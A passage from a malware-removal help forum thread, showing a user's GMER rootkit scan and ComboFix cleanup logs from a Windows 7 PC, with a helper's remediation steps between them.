C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2015-09-13 22:19 ==================== Ende von FRST.txt ============================ gmer Code:
ATTFilter GMER 2.1.19357 - hxxp://www.gmer.net Rootkit scan 2015-09-20 19:29:17 Windows 6.1.7600 x64 \Device\Harddisk0\DR0 -> \Device\00000065 SAMSUNG_ rev.KF10 186,31GB Running: Gmer-19357.exe; Driver: C:\Users\KENNYG~1\AppData\Local\Temp\fwdiipog.sys ---- Kernel code sections - GMER 2.1 ---- INITKDBG C:\Windows\system32\ntoskrnl.exe suspicious modification ---- User code sections - GMER 2.1 ---- .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 
00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!recv + 82 00000000726417fa 2 bytes CALL 74fc1199 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!recvfrom + 88 0000000072641860 2 bytes CALL 74fc1199 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!setsockopt + 98 0000000072641942 2 bytes JMP 751ec29f C:\Windows\syswow64\WS2_32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!setsockopt + 109 000000007264194d 2 bytes JMP 751e418d C:\Windows\syswow64\WS2_32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleFileNameExW + 17 00000000750b1401 2 bytes JMP 74fdeb26 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!EnumProcessModules + 17 00000000750b1419 2 bytes JMP 74feb513 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 17 00000000750b1431 2 bytes JMP 75068609 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 42 00000000750b144a 2 bytes CALL 74fc1dfa C:\Windows\syswow64\kernel32.dll .text ... 
* 9 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!EnumDeviceDrivers + 17 00000000750b14dd 2 bytes JMP 75067efe C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetDeviceDriverBaseNameA + 17 00000000750b14f5 2 bytes JMP 750680d8 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!QueryWorkingSetEx + 17 00000000750b150d 2 bytes JMP 75067df4 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetDeviceDriverBaseNameW + 17 00000000750b1525 2 bytes JMP 750681c2 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleBaseNameW + 17 00000000750b153d 2 bytes JMP 74fdf088 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!EnumProcesses + 17 00000000750b1555 2 bytes JMP 74feb885 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetProcessMemoryInfo + 17 00000000750b156d 2 bytes JMP 750686c1 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetPerformanceInfo + 17 00000000750b1585 2 bytes JMP 75068222 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!QueryWorkingSet + 17 00000000750b159d 2 bytes JMP 75067db8 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleBaseNameA + 17 00000000750b15b5 2 bytes JMP 74fdf121 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleFileNameExA + 17 00000000750b15cd 2 bytes JMP 74feb29f C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetProcessImageFileNameW + 20 
00000000750b16b2 2 bytes JMP 75068584 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetProcessImageFileNameW + 31 00000000750b16bd 2 bytes JMP 75067d4d C:\Windows\syswow64\kernel32.dll .text C:\Windows\system32\svchost.exe[2708] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 0000000177100128 .text C:\Windows\system32\svchost.exe[2708] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 0000000177100018 .text C:\Windows\system32\svchost.exe[2708] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000771000a0 .text C:\Windows\system32\svchost.exe[2708] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Program Files (x86)\Could not connect. 
Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Windows\system32\taskhost.exe[3408] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\system32\taskhost.exe[3408] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\taskhost.exe[3408] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\taskhost.exe[3408] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\system32\Dwm.exe[3556] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\system32\Dwm.exe[3556] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\Dwm.exe[3556] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\Dwm.exe[3556] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\system32\conhost.exe[3564] 
C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\system32\conhost.exe[3564] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\conhost.exe[3564] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\conhost.exe[3564] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\Explorer.EXE[3616] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\Explorer.EXE[3616] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\Explorer.EXE[3616] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\Explorer.EXE[3616] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 
.text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 
00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\System32\svchost.exe[3964] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 0000000177100128 .text C:\Windows\System32\svchost.exe[3964] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 0000000177100018 .text C:\Windows\System32\svchost.exe[3964] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000771000a0 .text C:\Windows\System32\svchost.exe[3964] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files\Windows Media Player\wmpnetwk.exe[3240] 
C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\wuauclt.exe[4160] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\system32\wuauclt.exe[4160] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\wuauclt.exe[4160] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\wuauclt.exe[4160] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 ---- Kernel code sections - GMER 2.1 ---- INITKDBG C:\Windows\system32\ntoskrnl.exe suspicious modification INITKDBG C:\Windows\system32\ntoskrnl.exe suspicious modification ---- Processes - GMER 2.1 ---- Library C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{10C73F7D-C192-4DD9-B951-F4037A142952}\mpengine.dll (*** suspicious ***) @ C:\Windows\System32\svchost.exe [3964] (Microsoft Malware Protection Engine/Microsoft Corporation)(2015-09-19 14:16:43) 000007feeda50000 ---- EOF - GMER 2.1 ---- |
20.09.2015, 19:39 | #3 |
/// Malwareteam | Malware-gen, Adware-gen ... etc. I am working on your topic and will get back to you as soon as possible with further instructions. Please note that all my replies must first be approved by an instructor before I am allowed to post them here. This guarantees that you get help from a trained helper. Thank you for your patience.
__________________ |
20.09.2015, 21:24 | #4 |
/// Malwareteam | Malware-gen, Adware-gen ... etc. Step 1 Go to Control Panel -> Programs and Features and uninstall the following program:
Step 2 Scan with Combofix
So in your next reply, please post:
__________________ Regards, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ |
21.09.2015, 17:57 | #5 |
| Malware-gen, Adware-gen ...etc. Code:
ATTFilter ComboFix 15-09-21.01 - Kenny G 21.09.2015 18:17:02.1.2 - x64 ausgeführt von:: c:\users\Kenny G\Downloads\ComboFix.exe * Neuer Wiederherstellungspunkt wurde erstellt . . (((((((((((((((((((((((((((((((((((( Weitere Löschungen )))))))))))))))))))))))))))))))))))))))))))))))) . . c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\www.weekweek.net (2).url c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\www.weekweek.net (3).url c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\www.weekweek.net.url c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\REAL HIPHOP ?? ???? ????????????????????? - ???? (2).URL . . . . Nicht in der Lage zu löschen c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\REAL HIPHOP ?? ???? ????????????????????? - ????.URL . . . . Nicht in der Lage zu löschen . . ((((((((((((((((((((((( Dateien erstellt von 2015-08-21 bis 2015-09-21 )))))))))))))))))))))))))))))) . . 2015-09-21 16:26 . 2015-09-21 16:26 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp 2015-09-21 16:26 . 2015-09-21 16:26 -------- d-----w- c:\users\Tabea Studium\AppData\Local\temp 2015-09-21 16:26 . 2015-09-21 16:26 -------- d-----w- c:\users\eLoot\AppData\Local\temp 2015-09-21 16:26 . 2015-09-21 16:26 -------- d-----w- c:\users\Default\AppData\Local\temp 2015-09-20 17:15 . 2015-09-20 17:35 -------- d-----w- C:\FRST 2015-09-20 15:43 . 2015-09-20 17:40 113880 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys 2015-09-20 15:42 . 2015-09-20 15:42 -------- d-----w- c:\program files (x86)\ Malwarebytes Anti-Malware 2015-09-20 15:42 . 2015-06-18 06:41 63704 ----a-w- c:\windows\system32\drivers\mwac.sys 2015-09-20 15:42 . 2015-06-18 06:41 109272 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys 2015-09-20 15:42 . 2015-06-18 06:41 25816 ----a-w- c:\windows\system32\drivers\mbam.sys 2015-09-19 15:25 . 2015-09-21 16:10 -------- d-----w- c:\program files (x86)\Trojan Remover 2015-09-19 15:11 . 
2015-09-20 15:29 584 ----a-w- C:\task.vbs 2015-09-19 14:17 . 2015-09-19 14:48 -------- d-----w- c:\windows\system32\MRT 2015-09-19 14:16 . 2015-09-16 03:43 11062400 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{10C73F7D-C192-4DD9-B951-F4037A142952}\mpengine.dll 2015-09-19 14:16 . 2015-09-19 14:16 -------- d-----w- c:\windows\system32\EventProviders 2015-09-19 10:25 . 2015-09-19 10:25 -------- d-----r- C:\MSOCache 2015-09-19 10:24 . 2015-09-19 10:24 -------- d-----w- c:\users\Kenny G\AppData\Local\Disc_Soft_Ltd 2015-09-19 10:21 . 2015-09-19 10:21 30264 ----a-w- c:\windows\system32\drivers\dtlitescsibus.sys 2015-09-19 10:21 . 2015-09-19 10:24 -------- d-----w- c:\users\Kenny G\AppData\Roaming\DAEMON Tools Lite 2015-09-19 10:21 . 2015-09-19 10:23 -------- d-----w- c:\program files\DAEMON Tools Lite 2015-09-19 10:21 . 2015-09-19 10:21 -------- d-----w- c:\programdata\DAEMON Tools Lite 2015-09-19 10:15 . 2015-09-19 10:15 -------- d-----w- c:\users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- 2015-09-19 10:12 . 2015-09-19 23:26 -------- d-----w- c:\program files (x86)\Could not connect. Error code = 0x-1442657579--- 2015-09-19 10:06 . 2015-09-19 10:12 -------- d-----w- c:\programdata\Microsoft Toolkit 2015-09-19 09:06 . 2015-09-19 09:06 -------- d-----w- c:\users\Kenny G\AppData\Local\Microsoft Help 2015-09-19 09:06 . 2015-09-19 14:06 -------- d-----w- c:\programdata\Microsoft Help 2015-09-01 18:31 . 2015-09-01 18:31 -------- d-----w- C:\Backup 2015-08-29 18:33 . 2015-08-29 18:34 -------- d-----w- c:\programdata\Package Cache . . . (((((((((((((((((((((((((((((((((((( Find3M Bericht )))))))))))))))))))))))))))))))))))))))))))))))))))))) . 2015-09-12 10:16 . 2014-01-15 18:58 282296 ----a-w- c:\windows\SysWow64\PnkBstrB.exe 2015-09-12 10:16 . 2014-01-15 18:58 282296 ----a-w- c:\windows\SysWow64\PnkBstrB.xtr 2015-09-12 10:14 . 2014-01-15 18:58 215128 ----a-w- c:\windows\SysWow64\PnkBstrB.ex0 2015-08-26 16:37 . 
2009-10-14 05:12 134753440 ----a-w- c:\windows\system32\MRT.exe 2015-08-19 09:53 . 2015-08-19 09:53 297904 ----a-w- c:\windows\system32\drivers\avgidsha.sys 2015-08-19 09:52 . 2015-08-19 09:52 313264 ----a-w- c:\windows\system32\drivers\avgidsdrivera.sys 2015-08-13 00:23 . 2013-10-05 07:44 778440 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe 2015-08-13 00:23 . 2013-10-05 07:44 142536 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl 2015-08-07 09:33 . 2015-08-07 09:34 422400 ----a-w- c:\windows\system32\LavasoftTcpService64.dll 2015-08-07 09:33 . 2015-08-07 09:33 342016 ----a-w- c:\windows\SysWow64\LavasoftTcpService.dll 2015-08-04 09:32 . 2015-08-04 09:32 300464 ----a-w- c:\windows\system32\drivers\avgtdia.sys 2015-08-04 09:32 . 2015-08-04 09:32 250800 ----a-w- c:\windows\system32\drivers\avgmfx64.sys 2015-07-09 05:11 . 2015-03-20 10:20 77760 ----a-w- c:\windows\system32\drivers\avgfwd6a.sys 2010-06-02 04:22 . 2010-06-02 04:22 89944 ----a-w- c:\program files (x86)\DSETUP.dll 2010-06-02 04:22 . 2010-06-02 04:22 537432 ----a-w- c:\program files (x86)\DXSETUP.exe 2010-06-02 04:22 . 2010-06-02 04:22 1801048 ----a-w- c:\program files (x86)\dsetup32.dll . . (((((((((((((((((((((((((((( Autostartpunkte der Registrierung )))))))))))))))))))))))))))))))))))))))) . . *Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. REGEDIT4 . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay] @="{56D36CD8-63C4-425D-B03D-CC30C1711EA4}" [HKEY_CLASSES_ROOT\CLSID\{56D36CD8-63C4-425D-B03D-CC30C1711EA4}] 2012-04-09 15:27 158224 ----a-w- c:\windows\SysWOW64\CbFsMntNtf3.dll . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay] @="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}" [HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}] 2012-04-09 15:27 158224 ----a-w- c:\windows\SysWOW64\CbFsMntNtf3.dll . 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "DAEMON Tools Lite Automount"="c:\program files\DAEMON Tools Lite\DTAgent.exe" [2015-06-18 4468056] . [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] "AVG_UI"="c:\program files (x86)\AVG\AVG2015\avgui.exe" [2015-08-24 3775912] . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system] "ConsentPromptBehaviorAdmin"= 5 (0x5) "ConsentPromptBehaviorUser"= 3 (0x3) "EnableUIADesktopToggle"= 0 (0x0) . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows] "LoadAppInit_DLLs"=1 (0x1) . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-] "Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" . R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x] R2 LavasoftTcpService;LavasoftTcpService;c:\program files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe;c:\program files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [x] R2 MBAMService;MBAMService;c:\program files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe;c:\program files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [x] R2 SearchProtectionService;IE Search Set;c:\program files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe;c:\program files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [x] R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x] R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x] R3 Sony PC Companion;Sony PC Companion;c:\program files (x86)\Sony\Sony PC Companion\PCCService.exe;c:\program files 
